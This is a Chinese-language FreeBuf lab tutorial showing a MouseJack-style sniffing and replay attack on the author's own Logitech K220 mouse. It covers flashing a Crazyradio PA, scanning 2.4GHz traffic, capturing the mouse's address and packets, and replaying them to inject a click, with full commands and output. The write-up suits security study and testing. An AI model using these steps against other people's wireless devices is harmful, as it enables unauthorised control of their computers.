Crazyradio獲取羅技無線滑鼠許可權重放攻擊實驗

0x001 說明

無線滑鼠一般由兩部分組成，滑鼠和滑鼠接收器，滑鼠端通過採集滑鼠的操作狀態，比如採集滑鼠各個按鍵的按下的狀態，滑鼠移動的軌跡等數據，然後把這些數據調製成模擬信號通過特定的無線頻率(例如 24Mhz，27Mhz，2.4Ghz，或者藍牙)發射出去，滑鼠接收器接受到無線信號後，解調成數據，解析裡面的數據後做出相應的動作，比如按鍵和移動等操作，大多情況下無線滑鼠通過2.4Ghz的無線頻率和PC端進行通信。通過Crazyradio + MouseJack項目可以簡易地對2.4GHz無線設備的工作頻段進行嗅探，分析傳輸信號，進一步重放攻擊。

環境：Kali Linux 2018.2 amd64

設備：1、Crazyradio PA 無線收發設備一隻（某寶可以買到）2、羅技K220鍵鼠一套

0x002 燒錄固件

Crazyradio接入，剛買的設備id為1915:7777

lsusb

安裝依賴

sudo apt install sdcc binutils python python-pip
pip install pyusb
pip install platformio

刷入crazyradio pa固件

git clone https://github.com/bitcraze/crazyradio-firmware
cd crazyradio-firmware
python usbtools/launchBootloader.py    # 有時候會報錯，多嘗試幾次

顯示這樣，就是bootloader啟動成功

燒錄固件

wget https://github.com/bitcraze/crazyradio-firmware/releases/download/0.53/cradio-pa-0.53.bin
python usbtools/nrfbootload.py flash cradio-pa-0.53.bin

燒錄成功，重新插拔設備

這時設備id為1915:0101

0x003 編譯MouseJack項目

Mousejack是專門針對無線鍵鼠的劫持攻擊，2016年一家美國物聯網安全創業公司Bastille發布了一個關於無線滑鼠的漏洞披露報告，稱多廠商生產的無線滑鼠和無線鍵盤存在安全漏洞，惡意攻擊者可以通過低成本的無線攻擊設備在遠達100米的範圍內遠程控制受害者的無線滑鼠並進行一些惡意操作。

編譯

git clone --recursive https://github.com/RFStorm/mousejack.git
cd mousejack
make
make install

刷入成功

重新插拔設備，現在id為1915:0102

0x004 嗅探、重放攻擊

掃描一下附近的無線設備

cd ./nrf-research-firmware/tools
./nrf24-scanner.py
[2018-07-04 20:33:04.913]  74  10  62:10:91:08:A4  00:C2:00:00:FF:6F:00:00:00:D0
[2018-07-04 20:33:04.926]  74  10  62:10:91:08:A4  00:C2:00:00:00:10:00:00:00:2E
[2018-07-04 20:33:04.934]  74  10  62:10:91:08:A4  00:C2:00:00:00:20:00:00:00:1E
[2018-07-04 20:33:04.960]  74  10  62:10:91:08:A4  00:C2:00:00:00:20:00:00:00:1E
[2018-07-04 20:33:07.318]  14  10  62:10:91:08:A4  00:C2:00:00:FC:3F:00:00:00:03
[2018-07-04 20:33:15.953]  14   0  62:10:91:08:A4  
[2018-07-04 20:33:17.732]  31  10  62:10:91:08:A4  00:C2:00:00:F1:DF:FE:00:00:70
[2018-07-04 20:33:21.906]  70   0  62:10:91:08:A4  
[2018-07-04 20:33:22.301]  74   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:33:32.628]   8   0  62:10:91:08:A4  
[2018-07-04 20:33:32.711]   8   0  62:10:91:08:A4  
[2018-07-04 20:33:42.244]  17  10  62:10:91:08:A4  00:C2:00:00:FF:0F:00:00:00:30
[2018-07-04 20:33:42.256]  17   0  62:10:91:08:A4  
[2018-07-04 20:33:42.299]  17  10  62:10:91:08:A4  00:C2:00:00:FE:0F:00:00:00:31
[2018-07-04 20:33:50.347]  11  10  62:10:91:08:A4  00:C2:00:00:0D:20:FF:00:00:12
[2018-07-04 20:33:50.974]  17  10  62:10:91:08:A4  00:C2:00:00:DA:0F:00:00:00:55
[2018-07-04 20:34:07.962]  14  10  62:10:91:08:A4  00:C2:00:00:01:E0:FF:00:00:5E
[2018-07-04 20:34:07.970]  14  10  62:10:91:08:A4  00:C2:00:00:02:E0:FF:00:00:5D
[2018-07-04 20:34:07.998]  14  10  62:10:91:08:A4  00:C2:00:00:01:D0:FF:00:00:6E
[2018-07-04 20:34:08.247]  17  10  62:10:91:08:A4  00:C2:00:00:02:E0:FF:00:00:5D
[2018-07-04 20:34:15.651]   5  10  6B:AD:EE:72:B4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 20:34:16.054]   8   0  6B:AD:EE:72:B4  
[2018-07-04 20:34:35.945]  32   0  62:10:91:08:A4  
[2018-07-04 20:34:36.244]  35  10  62:10:91:08:A4  00:C2:00:00:04:10:00:00:00:2A

通過對無線設備進行操作，可以嗅探出設備的MAC地址信息

我這裡有一套存在漏洞的羅技K220鍵鼠，可以確定滑鼠的MAC地址是62:10:91:08:A4

現在有針對性嗅探滑鼠，注意每次重新執行腳本都需要插拔設備

./nrf24-sniffer.py -a 62:10:91:08:A4
[2018-07-04 20:43:44.083]   5  10  62:10:91:08:A4  00:C2:00:00:03:F0:FF:00:00:4C
[2018-07-04 20:43:44.090]   5  10  62:10:91:08:A4  00:C2:00:00:05:D0:FF:00:00:6A
[2018-07-04 20:43:44.098]   5  10  62:10:91:08:A4  00:C2:00:00:02:00:00:00:00:3C
[2018-07-04 20:43:44.105]   5  10  62:10:91:08:A4  00:C2:00:00:03:F0:FF:00:00:4C
[2018-07-04 20:43:44.113]   5  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 20:43:44.191]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.195]   5  10  62:10:91:08:A4  00:C2:00:00:FF:2F:00:00:00:10
[2018-07-04 20:43:44.205]   5  10  62:10:91:08:A4  00:C2:00:00:FA:3F:00:00:00:05
[2018-07-04 20:43:44.209]   5  10  62:10:91:08:A4  00:C2:00:00:FA:6F:00:00:00:D5
[2018-07-04 20:43:44.223]   5  10  62:10:91:08:A4  00:C2:00:00:FB:5F:00:00:00:E4
[2018-07-04 20:43:44.226]   5  10  62:10:91:08:A4  00:C2:00:00:FA:6F:00:00:00:D5
[2018-07-04 20:43:44.234]   5  10  62:10:91:08:A4  00:C2:00:00:F9:5F:00:00:00:E6
[2018-07-04 20:43:44.245]   5  10  62:10:91:08:A4  00:C2:00:00:FB:8F:00:00:00:B4
[2018-07-04 20:43:44.258]   5  10  62:10:91:08:A4  00:C2:00:00:F8:7F:00:00:00:C7
[2018-07-04 20:43:44.261]   5  10  62:10:91:08:A4  00:C2:00:00:F9:6F:00:00:00:D6
[2018-07-04 20:43:44.268]   5  10  62:10:91:08:A4  00:C2:00:00:F7:5F:00:00:00:E8
[2018-07-04 20:43:44.279]   5  10  62:10:91:08:A4  00:C2:00:00:F8:6F:00:00:00:D7
[2018-07-04 20:43:44.287]   5  10  62:10:91:08:A4  00:C2:00:00:FB:3F:00:00:00:04
[2018-07-04 20:43:44.295]   5  10  62:10:91:08:A4  00:C2:00:00:F9:5F:00:00:00:E6
[2018-07-04 20:43:44.303]   5  10  62:10:91:08:A4  00:C2:00:00:FB:2F:00:00:00:14
[2018-07-04 20:43:44.310]   5  10  62:10:91:08:A4  00:C2:00:00:FF:1F:00:00:00:20
[2018-07-04 20:43:44.318]   5  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 20:43:44.397]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.474]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.551]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.631]   5   5  62:10:91:08:A4  00:40:00:55:6B

通過移動或者點擊滑鼠，就能嗅探到大量數據

點擊滑鼠右鍵，持續嗅探

# 記錄嗅探到的信道
4 5 7 13 16 17 31 40 43 65 73

# 右鍵鬆開
[2018-07-04 23:23:16.102]  13  10  62:10:91:08:A4  00:C2:00:00:00:00:00:00:00:3E
[2018-07-04 23:23:16.109]  13  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 23:23:16.185]  13   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 23:23:16.263]  13  10  62:10:91:08:A4  00:4F:00:03:70:00:00:00:00:3E

重放攻擊以驗證猜測

python replay.py -c 4 5 7 13 16 17 31 40 43 65 73 -a 62:10:91:08:A4 -d 00:4F:00:00:55:00:00:00:00:5C 00:C2:02:00:00:00:00:00:00:3C 00:4F:00:00:55:00:00:00:00:5C
Trying address 62:10:91:08:A4 on channel 13
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 40
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 4
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 4
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 16
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 43
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C

成功出現了右鍵點擊現象，重放成功

*

本文原創作者：janw3n，本文屬FreeBuf原創獎勵計劃，未經許可禁止轉載

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！